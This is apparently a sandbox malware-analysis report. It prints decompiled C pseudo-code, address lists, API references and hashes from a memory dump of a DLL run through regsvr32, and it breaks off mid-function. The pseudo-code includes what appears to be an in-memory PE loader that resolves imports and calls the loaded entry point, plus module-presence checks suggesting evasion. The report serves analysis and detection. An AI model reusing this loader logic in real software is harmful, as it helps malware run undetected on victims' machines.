							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x7e89ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t111 = _a4 + 4; // 0x0
						_t220 =  *_t111;
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E6CB14C70(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xec8b55c3
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x23e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x23e85000
							E6CB15DD0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E6CB14B30( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x23e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x6cb12db6
0x6cb12dbb
0x6cb12dbf
0x6cb12dc2
0x6cb12dc2
0x6cb12dc5
0x6cb12dca
0x6cb12dcf
0x6cb12dd2
0x6cb12dd7
0x6cb12dda
0x6cb12de0
0x6cb12de0
0x6cb12deb
0x6cb12dee
0x6cb12df5
0x6cb12dfa
0x00000000
0x00000000
0x6cb12e00
0x6cb12e05
0x6cb12e05
0x6cb12e0a
0x6cb12e10
0x6cb12e1a
0x6cb12e1f
0x6cb12e25
0x6cb12e44
0x6cb12e47
0x6cb12e52
0x6cb12e52
0x6cb12e52
0x6cb12e49
0x6cb12e49
0x6cb12e4b
0x00000000
0x6cb12e4d
0x6cb12e4d
0x6cb12e4d
0x6cb12e4b
0x6cb12e5a
0x6cb12e5f
0x6cb12e64
0x6cb12e6a
0x6cb12e6e
0x6cb12e71
0x6cb12e74
0x6cb12e7a
0x6cb12e7f
0x6cb12e82
0x6cb12e88
0x6cb12e8d
0x6cb12e93
0x6cb12e99
0x6cb12e9e
0x6cb12ea1
0x6cb12ea6
0x6cb12eaa
0x6cb12eae
0x6cb12eb1
0x6cb12eb4
0x6cb12ebd
0x6cb12ec4
0x6cb12ec7
0x6cb12eca
0x6cb12ecf
0x6cb12ed4
0x6cb12ed7
0x6cb12eda
0x6cb12eda
0x6cb12ede
0x6cb12ee7
0x6cb12eee
0x6cb12ef1
0x6cb12ef6
0x6cb12efb
0x6cb12efb
0x6cb12efe
0x6cb12f03
0x00000000
0x00000000
0x6cb12e27
0x6cb12e29
0x6cb12e36
0x00000000
0x00000000
0x6cb12e36
0x6cb12e29
0x00000000
0x6cb12e25
0x6cb12f09
0x6cb12f0e
0x6cb12f11
0x6cb12f14
0x6cb12fbf
0x6cb12fbf
0x6cb12f1a
0x6cb12f1a
0x6cb12f1a
0x6cb12f1f
0x6cb12f49
0x6cb12f4c
0x6cb12f4c
0x6cb12f51
0x6cb12f53
0x6cb12f55
0x6cb12f58
0x6cb12f5b
0x6cb12f63
0x6cb12f68
0x6cb12f68
0x6cb12f6e
0x6cb12f71
0x6cb12f74
0x6cb12f77
0x6cb12f79
0x6cb12f79
0x6cb12f7a
0x6cb12f7a
0x6cb12f77
0x6cb12f88
0x6cb12f8b
0x6cb12f8f
0x6cb12f94
0x6cb12f97
0x6cb12f9a
0x6cb12f9a
0x6cb12f9a
0x6cb12f9d
0x6cb12f9d
0x6cb12fa0
0x6cb12fa0
0x6cb12f21
0x6cb12f21
0x6cb12f31
0x6cb12f34
0x6cb12f39
0x6cb12f39
0x6cb12f3c
0x6cb12f3f
0x6cb12f42
0x6cb12f44
0x6cb12f44
0x6cb12fa3
0x6cb12fa5
0x6cb12fa8
0x6cb12fa8
0x6cb12fae
0x6cb12fb2
0x6cb12fb5
0x6cb12fb7
0x6cb12fb7
0x6cb12fc8
0x6cb12fca
0x6cb12fca
0x6cb12fd2
0x6cb12fe0
0x6cb12fe3
0x6cb12fe5
0x6cb13005
0x6cb13005
0x6cb13008
0x6cb1300e
0x6cb1300f
0x6cb13012
0x6cb13014
0x6cb13017
0x6cb1301a
0x6cb1301d
0x6cb13021
0x6cb13024
0x6cb13027
0x6cb1302a
0x6cb1302c
0x6cb1302c
0x6cb1302f
0x6cb13031
0x6cb13031
0x6cb13034
0x6cb13036
0x6cb13039
0x6cb13041
0x6cb13044
0x6cb13049
0x6cb13049
0x6cb1304f
0x6cb13052
0x6cb13055
0x6cb13057
0x6cb13057
0x6cb13058
0x6cb13058
0x6cb13063
0x6cb13063
0x6cb13063
0x6cb13066
0x6cb13069
0x6cb13069
0x6cb1306c
0x6cb1306c
0x6cb1302f
0x6cb13072
0x6cb13072
0x6cb13075
0x6cb13077
0x6cb1307a
0x6cb1307c
0x6cb1307f
0x6cb13082
0x6cb13084
0x6cb13087
0x6cb1308f
0x6cb13097
0x6cb1309a
0x6cb1309a
0x6cb1309a
0x6cb1309d
0x6cb1309d
0x6cb1309d
0x6cb130a0
0x6cb130a6
0x6cb130a8
0x6cb130a8
0x6cb130ae
0x6cb130b4
0x6cb130bd
0x6cb130c4
0x6cb130c6
0x6cb130c9
0x6cb130c9
0x6cb130cc
0x6cb130cc
0x6cb130cf
0x6cb130d1
0x6cb130d4
0x6cb130d6
0x6cb130f1
0x6cb130f1
0x6cb130f5
0x6cb130f8
0x6cb130fb
0x6cb130fe
0x6cb13114
0x6cb13114
0x6cb13114
0x6cb13100
0x6cb13100
0x6cb13102
0x6cb13106
0x6cb13109
0x00000000
0x6cb1310b
0x6cb1310b
0x6cb1310d
0x00000000
0x6cb1310f
0x6cb1310f
0x6cb1310f
0x6cb1310d
0x6cb13109
0x6cb13118
0x6cb1311b
0x6cb13120
0x6cb1312a
0x6cb1312a
0x6cb1312a
0x6cb1312d
0x6cb130d8
0x6cb130d8
0x6cb130da
0x6cb130e1
0x6cb130e1
0x6cb130e3
0x6cb130e5
0x6cb130e7
0x6cb130eb
0x6cb130ed
0x6cb130ef
0x00000000
0x00000000
0x6cb130ef
0x6cb130eb
0x6cb130dc
0x6cb130dc
0x6cb130df
0x00000000
0x00000000
0x6cb130df
0x6cb130da
0x6cb13137
0x6cb13139
0x6cb13139
0x6cb13144
0x6cb12fe7
0x6cb12fe7
0x6cb12fea
0x00000000
0x6cb12fec
0x6cb12fec
0x6cb12fee
0x6cb12ff2
0x00000000
0x6cb12ff4
0x6cb12ff4
0x6cb12ff4
0x6cb12ff7
0x00000000
0x6cb12ffb
0x6cb13004
0x6cb13004
0x6cb12ff7
0x6cb12ff2
0x6cb12fea
0x6cb12fd6
0x6cb12fdf
0x6cb12fdf

APIs

memcpy.MSVCRT ref: 6CB12EBD
memcpy.MSVCRT ref: 6CB12F34
memcpy.MSVCRT ref: 6CB12F63
memcpy.MSVCRT ref: 6CB12F8F
memcpy.MSVCRT ref: 6CB13044

Part of subcall function 6CB15DD0: memcpy.MSVCRT ref: 6CB15EAE

Part of subcall function 6CB14B30: memcpy.MSVCRT ref: 6CB14B5A

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction ID: 1fbcbbc9d90cd8a1c1359db8819650a8634841d6925dd9194dafc606641a1efe
Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
Instruction Fuzzy Hash: 74D128756086409FCB24CF6DC8D4A5AB7F5FF88318B24892DE48AC7B01E731E944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CB04D60, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6CB04D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x6cb1e688; // 0xd40590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E6CB0B7EA(0x6cb1b9c4,  &_v516) + 1; // 0x1
					E6CB0A8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E6CB0A4B3( &_v556, _t298);
					 *0x6cb1e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x6cb1e680 = E6CB0E1FE(0x6cb1b9c8, _t299);
						 *_t337 = 0x610;
						_t124 = E6CB095C2(0x6cb1b9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x6cb1e688; // 0xd40590
						_t127 = E6CB092C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E6CB085B6( &_v612);
						_t130 = E6CB0B2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E6CB085FB( &_v616, 0xfffffffe);
						_t133 =  *0x6cb1e688; // 0xd40590
						_t21 = _t133 + 0x110; // 0xdbfd98
						_t22 = _t133 + 0x114; // 0xd406a4
						E6CB049FE( *((intOrPtr*)( *_t21)), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x6cb1e688; // 0xd40590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_t28 = _t262 + 0x214; // 0x2
							_v576 =  *_t28;
							_t137 =  *0x6cb1e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E6CB0E308(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x6cb1e6b4; // 0xdbfc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E6CB0E308(_t353,  &_v588);
								_t235 =  *0x6cb1e6b4; // 0xdbfc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x6cb1e73c;
							if( *0x6cb1e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x6cb1e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x6cb1e688; // 0xd40590
								_t45 = _t166 + 0x214; // 0x2
								_t262 =  *_t45;
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E6CB04998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x6cb1e684; // 0xdbfaa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x6cb1e688; // 0xd40590
											_t184 = E6CB0FC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E6CB085E5(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E6CB0109A(_t262, 0x148);
													_t305 =  *0x6cb1e688; // 0xd40590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E6CB0900E(_t271,  &_v572);
													_t272 =  *0x6cb1e688; // 0xd40590
													_t92 = _t272 + 0xa0; // 0x1
													_t188 = E6CB060C0( &_v572, _t272 + 0x228, 1,  *_t92);
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x6cb1e688; // 0xd40590
														__eflags = _t200 + 0x1020;
														E6CB09621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E6CB085B6( &_v636);
														E6CB0A953(_t333, 0, 0xbb8, 1);
														E6CB085FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E6CB085FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E6CB04998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x6cb1e684; // 0xdbfaa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E6CB085E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E6CB095C2(_t278, 0x32d);
										_t280 =  *0x6cb1e688; // 0xd40590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E6CB09621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E6CB085B6( &_v636);
										E6CB0A953(_t249, 0, 0xbb8, 1);
										E6CB085FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t24 = _t262 + 0x214; // 0x2
							_t238 =  *_t24;
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E6CB095C2(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x6cb1e688; // 0xd40590
								_t329 = E6CB092C6(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E6CB0B2AB(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x6cb1e684; // 0xdbfaa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E6CB085FB( &_v612, 0xfffffffe);
								}
								E6CB085B6( &_v616);
								_t150 =  *0x6cb1e688; // 0xd40590
								lstrcpynW(_t150 + 0x438,  *0x6cb1e740, 0x105);
								_t153 =  *0x6cb1e688; // 0xd40590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x6cb1e738, 0x105);
								_t331 =  *0x6cb1e688; // 0xd40590
								_t117 = _t331 + 0x228; // 0xd407b8
								 *((intOrPtr*)(_t331 + 0x434)) = E6CB08F9F(_t117, __eflags);
								E6CB085FB(0x6cb1e740, 0xfffffffe);
								E6CB085FB(0x6cb1e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E6CB095A8(0x6e2);
				_v616 = _t250;
				_t326 = E6CB095A8(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E6CB085A3( &_v616);
					_t122 = E6CB085A3( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x6cb04d60
0x6cb04d66
0x6cb04d6c
0x6cb04d71
0x6cb04d7f
0x6cb04d82
0x6cb04de1
0x6cb04df3
0x6cb04df6
0x6cb04dfd
0x6cb04e02
0x6cb04e07
0x6cb04e0e
0x6cb04e18
0x6cb04e1f
0x6cb04e2a
0x6cb04e2f
0x6cb04e36
0x6cb04e3c
0x6cb04e3e
0x6cb04e3f
0x6cb04e43
0x6cb04e4e
0x6cb04e53
0x6cb04e5c
0x6cb04e61
0x6cb04e69
0x6cb04e70
0x6cb04e71
0x6cb04e73
0x6cb04e8f
0x6cb04e92
0x6cb04e92
0x6cb04e9b
0x6cb04ea0
0x6cb04eaa
0x6cb04eb0
0x6cb04eb8
0x6cb04ebd
0x6cb04ec3
0x6cb04ec6
0x6cb04ecc
0x6cb04eeb
0x6cb04ef1
0x6cb04ef2
0x6cb04ef3
0x6cb04ef4
0x6cb04ef5
0x6cb04ef6
0x6cb04efa
0x6cb04f00
0x6cb04f04
0x6cb04f09
0x6cb04f0c
0x6cb04f0e
0x6cb04f20
0x6cb04f20
0x6cb04f22
0x6cb04f2e
0x6cb04f33
0x6cb04f39
0x6cb04f42
0x6cb04f45
0x6cb04f47
0x6cb04f52
0x6cb04f57
0x6cb04f5c
0x6cb04f61
0x6cb04f61
0x6cb04f64
0x6cb04f6b
0x00000000
0x6cb04f71
0x6cb04f71
0x6cb04f76
0x6cb04f7a
0x6cb04f7c
0x6cb04f7f
0x6cb04f81
0x6cb04f87
0x6cb04f87
0x6cb04f81
0x6cb04f89
0x6cb04f8e
0x6cb04f8e
0x6cb04f94
0x6cb04f96
0x00000000
0x6cb04f9c
0x6cb04f9c
0x6cb04fa0
0x6cb05075
0x6cb0507b
0x6cb05081
0x6cb0508c
0x6cb0508d
0x6cb0508e
0x6cb0508f
0x6cb05095
0x6cb0509a
0x6cb050a0
0x6cb050a8
0x6cb050ae
0x6cb050b1
0x6cb050c0
0x6cb050c7
0x6cb050ca
0x6cb050d7
0x6cb050db
0x6cb050e8
0x6cb050ed
0x6cb050f0
0x6cb050f2
0x6cb05103
0x6cb05105
0x6cb05109
0x6cb0510a
0x6cb0510c
0x6cb05117
0x6cb0511c
0x6cb05129
0x6cb0512d
0x6cb0512e
0x6cb05130
0x6cb05138
0x6cb05139
0x6cb0513e
0x6cb05147
0x6cb05156
0x6cb0515b
0x6cb0515e
0x6cb05162
0x6cb05164
0x6cb05177
0x6cb05181
0x6cb05185
0x6cb0518d
0x6cb0518e
0x6cb05196
0x6cb05197
0x6cb0519c
0x6cb051a8
0x6cb051b2
0x6cb051c4
0x6cb051d0
0x6cb051d5
0x6cb051d5
0x6cb051df
0x6cb051e5
0x6cb051e5
0x6cb0510c
0x6cb050f2
0x00000000
0x6cb0507b
0x6cb04fa6
0x6cb04fa9
0x00000000
0x00000000
0x6cb04faf
0x6cb04fba
0x6cb04fbb
0x6cb04fbc
0x6cb04fbd
0x6cb04fc3
0x6cb04fc8
0x6cb04fdc
0x6cb04fe1
0x6cb04fe5
0x6cb04ff0
0x6cb04ff9
0x6cb04ffb
0x6cb04fff
0x6cb05000
0x6cb05002
0x6cb0500d
0x6cb05013
0x6cb05025
0x6cb05028
0x6cb0502b
0x6cb05038
0x6cb05040
0x6cb0504a
0x6cb0505c
0x6cb05068
0x6cb0506d
0x00000000
0x6cb05002
0x6cb04f96
0x6cb04ece
0x6cb04ece
0x6cb04ece
0x6cb04ed4
0x6cb04ed6
0x00000000
0x00000000
0x6cb04ed8
0x6cb04edc
0x6cb051e6
0x6cb051eb
0x6cb051f1
0x6cb051f3
0x6cb051f4
0x6cb051f8
0x6cb05208
0x6cb0520d
0x6cb05211
0x6cb05213
0x6cb05217
0x6cb0521c
0x6cb0521e
0x6cb05220
0x6cb05226
0x6cb05226
0x6cb05233
0x6cb05239
0x6cb0523f
0x6cb05244
0x6cb05262
0x6cb05264
0x6cb05270
0x6cb05270
0x6cb05276
0x6cb05278
0x6cb0527e
0x6cb05290
0x6cb05296
0x6cb052a2
0x6cb052aa
0x6cb052aa
0x6cb052aa
0x6cb052ac
0x6cb052b2
0x6cb052b2
0x6cb04ee2
0x6cb04ee5
0x00000000
0x00000000
0x00000000
0x6cb04ee5
0x6cb04ecc
0x6cb04e10
0x6cb04e10
0x00000000
0x6cb04e10
0x6cb04d8e
0x6cb04d95
0x6cb04d9e
0x6cb04da0
0x6cb04da6
0x6cb04db7
0x6cb04dc0
0x6cb04dc0
0x6cb04dcc
0x6cb04dd5
0x6cb04dda
0x6cb04ddf
0x00000000
0x00000000
0x6cb04ddf

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 6CB04DB3
GetModuleHandleA.KERNEL32(00000000), ref: 6CB04DBA
lstrcpynW.KERNEL32(00D40158,00000105), ref: 6CB05262
lstrcpynW.KERNEL32(00D40368,00000105), ref: 6CB05276

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 2457ee5bdc593ed77fa1cb685a9c266f79cd98d875f7d9e2cbd4446c58b72e12
Instruction ID: da64c5e0eba7354d865561d9cebd5225bcda9ce9361fecf6d5357eb83f10271b
Opcode Fuzzy Hash: 2457ee5bdc593ed77fa1cb685a9c266f79cd98d875f7d9e2cbd4446c58b72e12
Instruction Fuzzy Hash: AFE1DF71708381AFE700CB64C845FAE7BE9EB98318F50092AF544DBA90DB75D948CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6CB12B24, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6CB12B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
